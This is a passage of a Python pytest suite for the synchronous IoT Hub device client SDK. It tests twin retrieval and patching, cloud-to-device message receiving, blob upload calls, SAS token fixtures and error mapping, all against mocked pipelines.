def patch_get_twin_to_return_fake_twin(self, fake_twin, mocker, mqtt_pipeline):
def immediate_callback(callback):
callback(twin=fake_twin)
mocker.patch.object(mqtt_pipeline, "get_twin", side_effect=immediate_callback)
@pytest.mark.it("Implicitly enables twin messaging feature if not already enabled")
def test_enables_twin_only_if_not_already_enabled(
self, mocker, client, mqtt_pipeline, patch_get_twin_to_return_fake_twin, fake_twin
):
# Verify twin enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = False # twin will appear disabled
client.get_twin()
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.TWIN
mqtt_pipeline.enable_feature.reset_mock()
# Verify twin not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = True # twin will appear enabled
client.get_twin()
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Begins a 'get_twin' pipeline operation")
def test_get_twin_calls_pipeline(self, client, mqtt_pipeline):
client.get_twin()
assert mqtt_pipeline.get_twin.call_count == 1
@pytest.mark.it(
"Waits for the completion of the 'get_twin' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, fake_twin
):
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.get_twin,
kwargs={"twin": fake_twin},
)
client_manual_cb.get_twin()
@pytest.mark.it(
"Raises a client error if the `get_twin` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, pipeline_error, client_error
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.get_twin,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.get_twin()
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it("Returns the twin that the pipeline returned")
def test_verifies_twin_returned(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, fake_twin
):
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.get_twin,
kwargs={"twin": fake_twin},
)
returned_twin = client_manual_cb.get_twin()
assert returned_twin == fake_twin
class SharedClientPatchTwinReportedPropertiesTests(WaitsForEventCompletion):
@pytest.mark.it("Implicitly enables twin messaging feature if not already enabled")
def test_enables_twin_only_if_not_already_enabled(
self, mocker, client, mqtt_pipeline, twin_patch_reported
):
# patch this so patch_twin_reported_properties won't block
def immediate_callback(patch, callback):
callback()
mocker.patch.object(
mqtt_pipeline, "patch_twin_reported_properties", side_effect=immediate_callback
)
# Verify twin enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = False # twin will appear disabled
client.patch_twin_reported_properties(twin_patch_reported)
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.TWIN
mqtt_pipeline.enable_feature.reset_mock()
# Verify twin not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = True # twin will appear enabled
client.patch_twin_reported_properties(twin_patch_reported)
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Begins a 'patch_twin_reported_properties' pipeline operation")
def test_patch_twin_reported_properties_calls_pipeline(
self, client, mqtt_pipeline, twin_patch_reported
):
client.patch_twin_reported_properties(twin_patch_reported)
assert mqtt_pipeline.patch_twin_reported_properties.call_count == 1
assert (
mqtt_pipeline.patch_twin_reported_properties.call_args[1]["patch"]
is twin_patch_reported
)
@pytest.mark.it(
"Waits for the completion of the 'patch_twin_reported_properties' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, twin_patch_reported
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.patch_twin_reported_properties
)
client_manual_cb.patch_twin_reported_properties(twin_patch_reported)
@pytest.mark.it(
"Raises a client error if the `patch_twin_reported_properties` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
client_manual_cb,
mqtt_pipeline_manual_cb,
twin_patch_reported,
pipeline_error,
client_error,
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.patch_twin_reported_properties,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.patch_twin_reported_properties(twin_patch_reported)
assert e_info.value.__cause__ is my_pipeline_error
class SharedClientReceiveTwinDesiredPropertiesPatchTests(object):
@pytest.mark.it(
"Implicitly enables Twin desired properties patch feature if not already enabled"
)
def test_enables_twin_patches_only_if_not_already_enabled(self, mocker, client, mqtt_pipeline):
mocker.patch.object(
SyncClientInbox, "get"
) # patch this so receive_twin_desired_properties_patch won't block
# Verify twin patches enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = (
False
) # twin patches will appear disabled
client.receive_twin_desired_properties_patch()
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.TWIN_PATCHES
mqtt_pipeline.enable_feature.reset_mock()
# Verify twin patches not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = True  # twin patches will appear enabled
client.receive_twin_desired_properties_patch()
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Returns a patch from the twin patch inbox, if available")
def test_returns_message_from_twin_patch_inbox(self, mocker, client, twin_patch_desired):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = twin_patch_desired
manager_get_inbox_mock = mocker.patch.object(
client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock
)
received_patch = client.receive_twin_desired_properties_patch()
assert manager_get_inbox_mock.call_count == 1
assert inbox_mock.get.call_count == 1
assert received_patch is twin_patch_desired
@pytest.mark.it("Can be called in various modes")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_can_be_called_in_mode(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
client.receive_twin_desired_properties_patch(block=block, timeout=timeout)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=block, timeout=timeout)
@pytest.mark.it("Defaults to blocking mode with no timeout")
def test_default_mode(self, mocker, client):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
client.receive_twin_desired_properties_patch()
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=True, timeout=None)
@pytest.mark.it("Blocks until a patch is available, in blocking mode")
def test_no_message_in_inbox_blocking_mode(self, client, twin_patch_desired):
twin_patch_inbox = client._inbox_manager.get_twin_patch_inbox()
assert twin_patch_inbox.empty()
def insert_item_after_delay():
time.sleep(0.01)
twin_patch_inbox._put(twin_patch_desired)
insertion_thread = threading.Thread(target=insert_item_after_delay)
insertion_thread.start()
received_patch = client.receive_twin_desired_properties_patch(block=True)
assert received_patch is twin_patch_desired
# This proves that the blocking happens because 'received_patch' can't be
# 'twin_patch_desired' until after a 10 millisecond delay on the insert. But because the
# 'received_patch' IS 'twin_patch_desired', it means that client.receive_twin_desired_properties_patch
# did not return until after the delay.
@pytest.mark.it(
"Returns None after a timeout while blocking, in blocking mode with a specified timeout"
)
def test_times_out_waiting_for_message_blocking_mode(self, client):
result = client.receive_twin_desired_properties_patch(block=True, timeout=0.01)
assert result is None
@pytest.mark.it("Returns None immediately if there are no patches, in nonblocking mode")
def test_no_message_in_inbox_nonblocking_mode(self, client):
result = client.receive_twin_desired_properties_patch(block=False)
assert result is None
@pytest.mark.it("Locks the client to API Receive Mode if the receive mode has not yet been set")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_not_set(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
assert client._receive_type is RECEIVE_TYPE_NONE_SET
client.receive_twin_desired_properties_patch(block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Does not modify the client receive mode if it has already been set to API Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_api(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
client._receive_type = RECEIVE_TYPE_API
client.receive_twin_desired_properties_patch(block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Raises a ClientError and does nothing else if the client receive mode has been set to Handler Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_handler(self, mocker, client, mqtt_pipeline, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
# patch this so we can make sure feature enabled isn't modified
mqtt_pipeline.feature_enabled.__getitem__.return_value = False
client._receive_type = RECEIVE_TYPE_HANDLER
# Error was raised
with pytest.raises(client_exceptions.ClientError):
client.receive_twin_desired_properties_patch(block=block, timeout=timeout)
# Feature was not enabled
assert mqtt_pipeline.enable_feature.call_count == 0
# Inbox get was not called
assert inbox_mock.get.call_count == 0
################
# DEVICE TESTS #
################
class IoTHubDeviceClientTestsConfig(object):
@pytest.fixture
def client_class(self):
return IoTHubDeviceClient
@pytest.fixture
def client(self, mqtt_pipeline, http_pipeline):
"""This client automatically resolves callbacks sent to the pipeline.
It should be used for the majority of tests.
"""
return IoTHubDeviceClient(mqtt_pipeline, http_pipeline)
@pytest.fixture
def client_manual_cb(self, mqtt_pipeline_manual_cb, http_pipeline_manual_cb):
"""This client requires manual triggering of the callbacks sent to the pipeline.
It should only be used for tests where manual control of a callback is required.
"""
return IoTHubDeviceClient(mqtt_pipeline_manual_cb, http_pipeline_manual_cb)
@pytest.fixture
def connection_string(self, device_connection_string):
"""This fixture is parametrized to provie all valid device connection strings.
See client_fixtures.py
"""
return device_connection_string
@pytest.fixture
def sas_token_string(self, device_sas_token_string):
return device_sas_token_string
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - Instantiation")
class TestIoTHubDeviceClientInstantiation(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientInstantiationTests
):
@pytest.mark.it("Sets on_c2d_message_received handler in the MQTTPipeline")
def test_sets_on_c2d_message_received_handler_in_pipeline(
self, client_class, mqtt_pipeline, http_pipeline
):
client = client_class(mqtt_pipeline, http_pipeline)
assert client._mqtt_pipeline.on_c2d_message_received is not None
assert (
client._mqtt_pipeline.on_c2d_message_received == client._inbox_manager.route_c2d_message
)
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .create_from_connection_string()")
class TestIoTHubDeviceClientCreateFromConnectionString(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientCreateFromConnectionStringTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .create_from_sastoken()")
class TestIoTHubDeviceClientCreateFromSastoken(
IoTHubDeviceClientTestsConfig, SharedIoTHubDeviceClientCreateFromSastokenTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .create_from_symmetric_key()")
class TestIoTHubDeviceClientCreateFromSymmetricKey(
IoTHubDeviceClientTestsConfig, SharedIoTHubDeviceClientCreateFromSymmetricKeyTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .create_from_x509_certificate()")
class TestIoTHubDeviceClientCreateFromX509Certificate(
IoTHubDeviceClientTestsConfig, SharedIoTHubDeviceClientCreateFromX509CertificateTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .update_sastoken()")
class TestIoTHubDeviceClientUpdateSasToken(
IoTHubDeviceClientTestsConfig, SharedClientUpdateSasTokenTests
):
@pytest.fixture
def sas_config(self, sas_token_string):
"""PipelineConfig set up as if using user-provided, non-renewable SAS auth"""
sastoken = st.NonRenewableSasToken(sas_token_string)
token_uri_pieces = sastoken.resource_uri.split("/")
hostname = token_uri_pieces[0]
device_id = token_uri_pieces[2]
sas_config = IoTHubPipelineConfig(hostname=hostname, device_id=device_id, sastoken=sastoken)
return sas_config
@pytest.fixture
def sas_client(self, mqtt_pipeline, http_pipeline, sas_config):
"""Client configured as if using user-provided, non-renewable SAS auth"""
mqtt_pipeline.pipeline_configuration = sas_config
http_pipeline.pipeline_configuration = sas_config
return IoTHubDeviceClient(mqtt_pipeline, http_pipeline)
@pytest.fixture
def uri(self, hostname, device_id):
return "{hostname}/devices/{device_id}".format(hostname=hostname, device_id=device_id)
@pytest.fixture(params=["Nonmatching Device ID", "Nonmatching Hostname"])
def nonmatching_uri(self, request, device_id, hostname):
# NOTE: It would be preferable to have this as a parametrization on a test rather than a
# fixture, however, we need to use the device_id and hostname fixtures in order to ensure
# tests don't break when other fixtures change, and you can't include fixtures in a
# parametrization, so this also has to be a fixture
uri_format = "{hostname}/devices/{device_id}"
if request.param == "Nonmatching Device ID":
return uri_format.format(hostname=hostname, device_id="nonmatching_device")
else:
return uri_format.format(hostname="nonmatching_hostname", device_id=device_id)
@pytest.fixture(
params=["Too short", "Too long", "Incorrectly formatted device notation", "Module URI"]
)
def invalid_uri(self, request, device_id, hostname):
# NOTE: As in the nonmatching_uri fixture above, this is a workaround for parametrization
# that allows the usage of other fixtures in the parametrized value. Weird pattern, but
# necessary to ensure stability of the tests over time.
if request.param == "Too short":
# Doesn't have device ID
return hostname + "/devices"
elif request.param == "Too long":
# Extraneous value at the end
return "{}/devices/{}/somethingElse".format(hostname, device_id)
elif request.param == "Incorrectly formatted device notation":
# Doesn't have '/devices/'
return "{}/not-devices/{}".format(hostname, device_id)
else:
# Valid... for a Module... but this is a Device
return "{}/devices/{}/modules/my_module".format(hostname, device_id)
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .connect()")
class TestIoTHubDeviceClientConnect(IoTHubDeviceClientTestsConfig, SharedClientConnectTests):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .disconnect()")
class TestIoTHubDeviceClientDisconnect(IoTHubDeviceClientTestsConfig, SharedClientDisconnectTests):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .send_message()")
class TestIoTHubDeviceClientSendD2CMessage(
IoTHubDeviceClientTestsConfig, SharedClientSendD2CMessageTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .receive_message()")
class TestIoTHubDeviceClientReceiveC2DMessage(
IoTHubDeviceClientTestsConfig, WaitsForEventCompletion
):
@pytest.mark.it("Implicitly enables C2D messaging feature if not already enabled")
def test_enables_c2d_messaging_only_if_not_already_enabled(self, mocker, client, mqtt_pipeline):
mocker.patch.object(SyncClientInbox, "get") # patch this so receive_message won't block
# Verify C2D Messaging enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = False # C2D will appear disabled
client.receive_message()
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.C2D_MSG
mqtt_pipeline.enable_feature.reset_mock()
# Verify C2D Messaging not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = True # C2D will appear enabled
client.receive_message()
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Returns a message from the C2D inbox, if available")
def test_returns_message_from_c2d_inbox(self, mocker, client, message):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = message
manager_get_inbox_mock = mocker.patch.object(
client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock
)
received_message = client.receive_message()
assert manager_get_inbox_mock.call_count == 1
assert inbox_mock.get.call_count == 1
assert received_message is message
@pytest.mark.it("Can be called in various modes")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_can_be_called_in_mode(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
client.receive_message(block=block, timeout=timeout)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=block, timeout=timeout)
@pytest.mark.it("Defaults to blocking mode with no timeout")
def test_default_mode(self, mocker, client):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
client.receive_message()
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=True, timeout=None)
@pytest.mark.it("Blocks until a message is available, in blocking mode")
def test_no_message_in_inbox_blocking_mode(self, client, message):
c2d_inbox = client._inbox_manager.get_c2d_message_inbox()
assert c2d_inbox.empty()
def insert_item_after_delay():
time.sleep(0.01)
c2d_inbox._put(message)
insertion_thread = threading.Thread(target=insert_item_after_delay)
insertion_thread.start()
received_message = client.receive_message(block=True)
assert received_message is message
# This proves that the blocking happens because 'received_message' can't be
# 'message' until after a 10 millisecond delay on the insert. But because the
# 'received_message' IS 'message', it means that client.receive_message
# did not return until after the delay.
@pytest.mark.it(
"Returns None after a timeout while blocking, in blocking mode with a specified timeout"
)
def test_times_out_waiting_for_message_blocking_mode(self, client):
result = client.receive_message(block=True, timeout=0.01)
assert result is None
@pytest.mark.it("Returns None immediately if there are no messages, in nonblocking mode")
def test_no_message_in_inbox_nonblocking_mode(self, client):
result = client.receive_message(block=False)
assert result is None
@pytest.mark.it("Locks the client to API Receive Mode if the receive mode has not yet been set")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_not_set(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
assert client._receive_type is RECEIVE_TYPE_NONE_SET
client.receive_message(block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Does not modify the client receive mode if it has already been set to API Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_api(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
client._receive_type = RECEIVE_TYPE_API
client.receive_message(block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Raises a ClientError and does nothing else if the client receive mode has been set to Handler Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_handler(self, mocker, client, mqtt_pipeline, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
# patch this so we can make sure feature enabled isn't modified
mqtt_pipeline.feature_enabled.__getitem__.return_value = False
client._receive_type = RECEIVE_TYPE_HANDLER
# Error was raised
with pytest.raises(client_exceptions.ClientError):
client.receive_message(block=block, timeout=timeout)
# Feature was not enabled
assert mqtt_pipeline.enable_feature.call_count == 0
# Inbox get was not called
assert inbox_mock.get.call_count == 0
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .receive_method_request()")
class TestIoTHubDeviceClientReceiveMethodRequest(
IoTHubDeviceClientTestsConfig, SharedClientReceiveMethodRequestTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .send_method_response()")
class TestIoTHubDeviceClientSendMethodResponse(
IoTHubDeviceClientTestsConfig, SharedClientSendMethodResponseTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .get_twin()")
class TestIoTHubDeviceClientGetTwin(IoTHubDeviceClientTestsConfig, SharedClientGetTwinTests):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .patch_twin_reported_properties()")
class TestIoTHubDeviceClientPatchTwinReportedProperties(
IoTHubDeviceClientTestsConfig, SharedClientPatchTwinReportedPropertiesTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .receive_twin_desired_properties_patch()")
class TestIoTHubDeviceClientReceiveTwinDesiredPropertiesPatch(
IoTHubDeviceClientTestsConfig, SharedClientReceiveTwinDesiredPropertiesPatchTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .get_storage_info_for_blob()")
class TestIoTHubDeviceClientGetStorageInfo(WaitsForEventCompletion, IoTHubDeviceClientTestsConfig):
@pytest.mark.it("Begins a 'get_storage_info_for_blob' HTTPPipeline operation")
def test_calls_pipeline_get_storage_info_for_blob(self, mocker, client, http_pipeline):
fake_blob_name = "__fake_blob_name__"
client.get_storage_info_for_blob(fake_blob_name)
assert http_pipeline.get_storage_info_for_blob.call_count == 1
assert http_pipeline.get_storage_info_for_blob.call_args == mocker.call(
fake_blob_name, callback=mocker.ANY
)
@pytest.mark.it(
"Waits for the completion of the 'get_storage_info_for_blob' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, http_pipeline_manual_cb
):
fake_blob_name = "__fake_blob_name__"
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.get_storage_info_for_blob,
kwargs={"storage_info": "__fake_storage_info__"},
)
client_manual_cb.get_storage_info_for_blob(fake_blob_name)
@pytest.mark.it(
"Raises a client error if the `get_storage_info_for_blob` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, http_pipeline_manual_cb, pipeline_error, client_error
):
fake_blob_name = "__fake_blob_name__"
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.get_storage_info_for_blob,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.get_storage_info_for_blob(fake_blob_name)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it("Returns a storage_info object upon successful completion")
def test_returns_storage_info(self, mocker, client, http_pipeline):
fake_blob_name = "__fake_blob_name__"
fake_storage_info = "__fake_storage_info__"
received_storage_info = client.get_storage_info_for_blob(fake_blob_name)
assert http_pipeline.get_storage_info_for_blob.call_count == 1
assert http_pipeline.get_storage_info_for_blob.call_args == mocker.call(
fake_blob_name, callback=mocker.ANY
)
assert (
received_storage_info is fake_storage_info
) # Note: the return value this is checking for is defined in client_fixtures.py
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .notify_blob_upload_status()")
class TestIoTHubDeviceClientNotifyBlobUploadStatus(
WaitsForEventCompletion, IoTHubDeviceClientTestsConfig
):
@pytest.mark.it("Begins a 'notify_blob_upload_status' HTTPPipeline operation")
def test_calls_pipeline_notify_blob_upload_status(self, client, http_pipeline):
correlation_id = "__fake_correlation_id__"
is_success = "__fake_is_success__"
status_code = "__fake_status_code__"
status_description = "__fake_status_description__"
client.notify_blob_upload_status(
correlation_id, is_success, status_code, status_description
)
kwargs = http_pipeline.notify_blob_upload_status.call_args[1]
assert http_pipeline.notify_blob_upload_status.call_count == 1
assert kwargs["correlation_id"] is correlation_id
assert kwargs["is_success"] is is_success
assert kwargs["status_code"] is status_code
assert kwargs["status_description"] is status_description
@pytest.mark.it(
"Waits for the completion of the 'notify_blob_upload_status' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, http_pipeline_manual_cb
):
correlation_id = "__fake_correlation_id__"
is_success = "__fake_is_success__"
status_code = "__fake_status_code__"
status_description = "__fake_status_description__"
self.add_event_completion_checks(
mocker=mocker, pipeline_function=http_pipeline_manual_cb.notify_blob_upload_status
)
client_manual_cb.notify_blob_upload_status(
correlation_id, is_success, status_code, status_description
)
@pytest.mark.it(
"Raises a client error if the `notify_blob_upload_status` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, http_pipeline_manual_cb, pipeline_error, client_error
):
correlation_id = "__fake_correlation_id__"
is_success = "__fake_is_success__"
status_code = "__fake_status_code__"
status_description = "__fake_status_description__"
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.notify_blob_upload_status,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.notify_blob_upload_status(
correlation_id, is_success, status_code, status_description
)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - PROPERTY .on_message_received")
class TestIoTHubDeviceClientPROPERTYOnMessageReceivedHandler(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientPROPERTYHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_message_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.C2D_MSG
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - PROPERTY .on_method_request_received")
class TestIoTHubDeviceClientPROPERTYOnMethodRequestReceivedHandler(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientPROPERTYHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_method_request_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.METHODS
@pytest.mark.describe(
"IoTHubDeviceClient (Synchronous) - PROPERTY .on_twin_desired_properties_patch_received"
)
class TestIoTHubDeviceClientPROPERTYOnTwinDesiredPropertiesPatchReceivedHandler(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientPROPERTYHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_twin_desired_properties_patch_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.TWIN_PATCHES
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - PROPERTY .connected")
class TestIoTHubDeviceClientPROPERTYConnected(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientPROPERTYConnectedTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - OCCURANCE: Connect")
class TestIoTHubDeviceClientOCCURANCEConnect(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientOCCURANCEConnectTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - OCCURANCE: Disconnect")
class TestIoTHubDeviceClientOCCURANCEDisconnect(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientOCCURANCEDisconnectTests
):
pass
################
# MODULE TESTS #
################
class IoTHubModuleClientTestsConfig(object):
@pytest.fixture
def client_class(self):
return IoTHubModuleClient
@pytest.fixture
def client(self, mqtt_pipeline, http_pipeline):
"""This client automatically resolves callbacks sent to the pipeline.
It should be used for the majority of tests.
"""
return IoTHubModuleClient(mqtt_pipeline, http_pipeline)
